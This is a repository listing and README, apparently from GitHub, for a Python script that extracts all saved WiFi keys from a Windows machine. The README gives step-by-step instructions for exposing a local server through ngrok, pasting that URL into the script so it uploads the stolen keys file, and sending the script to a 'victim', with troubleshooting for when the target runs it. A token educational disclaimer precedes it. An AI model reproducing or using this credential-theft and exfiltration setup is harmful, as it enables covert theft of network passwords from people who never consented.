https://github.com/ibnaleem/wifikeycatcher
A Python Script That Extracts All WiFi Keys Saved on Windows OS
https://github.com/ibnaleem/wifikeycatcher
hacking-tool hacking-tools offensive-scripts redteam redteam-tools redteaming wifi-hacking wifi-hotspot wifi-network wifi-password wifi-security windows windows-10
Last synced: 2 months ago
JSON representation
A Python Script That Extracts All WiFi Keys Saved on Windows OS
- Host: GitHub
- URL: https://github.com/ibnaleem/wifikeycatcher
- Owner: ibnaleem
- License: mit
- Created: 2023-08-18T14:25:48.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2023-09-12T08:22:54.000Z (about 2 years ago)
- Last Synced: 2025-04-02T22:23:59.692Z (6 months ago)
- Topics: hacking-tool, hacking-tools, offensive-scripts, redteam, redteam-tools, redteaming, wifi-hacking, wifi-hotspot, wifi-network, wifi-password, wifi-security, windows, windows-10
- Language: Python
- Homepage:
- Size: 12.7 KB
- Stars: 2
- Watchers: 2
- Forks: 0
- Open Issues: 1
-
Metadata Files:
- Readme: docs/README.md
Awesome Lists containing this project
README
![]()
⚠️ Disclaimer: This repository is intended for educational purposes exclusively. I bear no responsibility for any illicit or unauthorized use of this project.
![]()
![]()
![]()
# Setup
1. Clone this repository:
```
$ git clone https://github.com/ibnaleem/WiFiKeyCatcher.git
```
2. Run `HTTPServer`:
```
$ py -m http.server
```
3. [Install ngrok](https://ngrok.com/download)
4. Configure auth-token in terminal:
```
$ ngrok config add-authtoken
```
5. Start tunnel on port 8000:
```
$ ngrok http 8000
```
If successful, you should see all of your system directories as embeded links.6. Copy ngrok URL and paste into `main.py` (line 52):
```python
url = "https://ngrok-url-here"
files = {'file': open(f'{curr_path}.txt', 'rb')}
```Save and send to victim. Note: ngrok must be running to obtain WiFi-Keys
#### Target Ran Script, Nothing Received
Make sure your target has Python installed, and you're running HTTP server + ngrok